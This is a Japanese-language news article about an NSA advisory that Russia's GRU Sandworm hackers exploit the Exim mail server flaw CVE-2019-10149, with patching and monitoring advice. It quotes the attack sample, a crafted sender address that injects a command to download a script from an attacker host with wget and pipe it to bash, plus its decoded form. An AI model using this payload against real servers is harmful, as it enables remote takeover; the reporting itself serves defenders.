NSAがクレムリンのハッカーによる攻撃について公に警告するのは日常茶飯事ではない。だから、この重大なEximの欠陥を真剣に受け止めよう。

Table of Contents

NSAがクレムリンのハッカーによる攻撃について公に警告するのは日常茶飯事ではない。だから、この重大なEximの欠陥を真剣に受け止めよう。

NSAは、パッチが存在するEximのリモートコード実行の欠陥をロシアが積極的に悪用しているとして警鐘を鳴らしている。

アメリカの監視機関は木曜日[PDF]、クレムリンの軍事情報ハッカーらが、昨年6月に修正された広く使用されているメール転送エージェント(MTA)であるEximのセキュリティホールであるCVE-2019-10149に対して脆弱な一部のシステムを積極的に狙っていると発表した。

NSA によると、モスクワのエクスプロイト コードのサンプルは次のとおりです。このコードは脆弱なサーバーに送信され、サーバーを乗っ取られる原因となります。フィルターに引っかからないように、一部を検閲しています。

メール送信元:<${run{\x2Fbin\x2Fsh\t-
c\t\x22exec\x20\x2Fusr\x2Fbin\x2Fwget\x20\x2DO\x20\x2D\x20hxxp\:\x2F\x2F\hostapp.be\x2Fscript1.sh\x20\x7C\x20bash\x22}}@hostapp.be> この16進数は次のようにデコードされます。
/bin/sh -c "exec /usr/bin/wget -O - hxxp://hostapp.be/script1.sh | bash"

NSAは、「参謀本部情報総局(GRU)の特殊技術本部(GTsST)に所属するロシアの攻撃者は、この脆弱性を利用して特権ユーザーを追加し、ネットワークセキュリティ設定を無効化し、さらなるネットワーク悪用のための追加スクリプトを実行した。これは、ネットワークがパッチ未適用のExim MTAを使用している限り、攻撃者にとってほぼ夢のようなアクセスだ」と述べた。

このケースでは、軍の支援を受けたサンドワーム作戦に関与する犯罪者が、Eximのdeliver_message()関数における受信者アドレスの不適切な検証を悪用し/src/deliver.c、シェルコマンドを挿入して実行します。このシェルコマンドは、別のスクリプトをダウンロードして実行し、サーバーを乗っ取ります。このプログラミングミスに関する詳細な技術的説明は、昨年この脆弱性を発見し報告したQualysによるこちらの記事でご覧いただけます。

ハッカー

アメリカの諜報機関は、英国に続いて深刻なVPNの脆弱性を警告した

続きを読む

Exim はメール用の Linux および Unix サーバーで何百万台も広く使用されているため、MTA のバグは本質的に公開されており、あらゆる国のハッカーにとって魅力的なターゲットとなります。

NSAは具体的に誰が標的となっているかを明らかにしていないが、ロシア軍が外国の政府機関や重要産業の調査に関心を持っていることは想像に難くない。一部の報道によると、GRUハッカーは以前にもエネルギー関連企業を標的にしていたという。

サンドワームハッキンググループは、以前にも英国の研究施設や英国外務省への攻撃に関与していたことが知られている。

NSAによると、SandwormグループによるCVE-2019-10149のエクスプロイトは8月から継続しているという。幸いなことに、このバグに対する修正も1年近く前から行われていた。この脆弱性はExim 4.87で導入され、2019年6月に修正されている。

Eximをバージョン4.93以降にアップデートすると、脆弱性が解消されます。管理者はアップデートをダウンロードできますが、何らかの理由でまだアップデートがインストールされていない場合は、Linuxディストリビューションのパッケージマネージャーを使用するのが最も簡単な方法です。

管理者は、新しいアカウントの追加やセキュリティ設定の変更など、疑わしいアクティビティがないかサーバーを注意深く監視することも推奨されます。

NSAは、「アカウントやSSHキーの追加など、不正なシステム変更が行われていないことを定期的に確認することで、侵害の検出に役立ちます」と述べています。「これらの変更を検出するために、管理者はファイル整合性監視ソフトウェアを使用して、管理者に警告を発したり、システムへの不正な変更をブロックしたりできます。」

MTA DMZが最小アクセスモデルで構成されていた場合、例えば、インターネット上のポート80/443宛てのMTA開始送信トラフィックをデフォルトで拒否し、ポート80/443上の必要なホストへのMTA開始トラフィックのみを許可するように構成されていた場合、CVE-2019-10149を使用する攻撃者の手法は軽減されていたでしょう。®

Discover More